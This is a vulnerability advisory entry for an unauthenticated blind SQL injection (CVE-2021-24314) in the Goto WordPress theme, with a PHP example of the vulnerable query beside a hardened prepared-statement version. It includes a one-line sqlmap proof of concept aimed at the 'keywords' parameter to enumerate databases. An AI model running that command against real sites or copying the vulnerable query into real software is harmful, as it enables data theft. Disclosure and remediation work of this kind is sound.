
Themes Vulnerabilities

Goto < 2.1 - Unauthenticated Blind SQL Injection

Description

The theme did not sanitise, validate or escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
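
The root cause described above, as an added example that is not the Goto theme's own code: a hypothetical listing query that concatenates the keywords GET value into SQL, next to a version that validates the value and binds it through $wpdb->prepare(). The function names, the tour post type and the query shape are assumptions, and WordPress must be loaded for $wpdb and the helper functions.

```php
<?php
// Added illustration: hypothetical listing query, not the Goto theme's source.
// Assumes WordPress is loaded, so $wpdb and the core sanitising helpers exist.

// Vulnerable pattern: the raw GET value is concatenated into the statement.
function tours_search_vulnerable() {
    global $wpdb;
    $keywords = $_GET['keywords'];
    return $wpdb->get_results(
        "SELECT ID, post_title FROM {$wpdb->posts}
         WHERE post_type = 'tour' AND post_title LIKE '%{$keywords}%'"
    );
}

// Hardened pattern: validate the input, then bind it as a parameter.
function tours_search_hardened() {
    global $wpdb;

    // Validate: accept only a scalar string, normalise it, bound its length.
    $raw = isset( $_GET['keywords'] ) && is_string( $_GET['keywords'] )
        ? wp_unslash( $_GET['keywords'] )
        : '';
    $keywords = mb_substr( sanitize_text_field( $raw ), 0, 100 );
    if ( '' === $keywords ) {
        return array();
    }

    // esc_like() neutralises the LIKE wildcards (% and _) in user input;
    // prepare() quotes the bound values so they cannot alter the statement.
    $like = '%' . $wpdb->esc_like( $keywords ) . '%';
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT ID, post_title FROM {$wpdb->posts}
             WHERE post_type = %s AND post_title LIKE %s",
            'tour', // hypothetical post type
            $like
        )
    );
}
```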

Proof of Concept

sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords 

Affects Themes

goto
Fixed in version 2.1

References

CVE
CVE-2021-24314
URL
https://m0ze.ru/vulnerability/%5B2021-03-24%5D-%5BWordPress%5D-%5BCWE-89%5D-Goto-WordPress-Theme-v2.0.txt

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

m0ze

Verified

No

WPVDB ID
1cc6dc17-b019-49dd-8149-c8bba165eb30

Timeline

Publicly Published

2021-04-26 (about 1 year ago)

Added

2021-04-29 (about 1 year ago)

Last Updated

2021-05-17 (about 1 year ago)
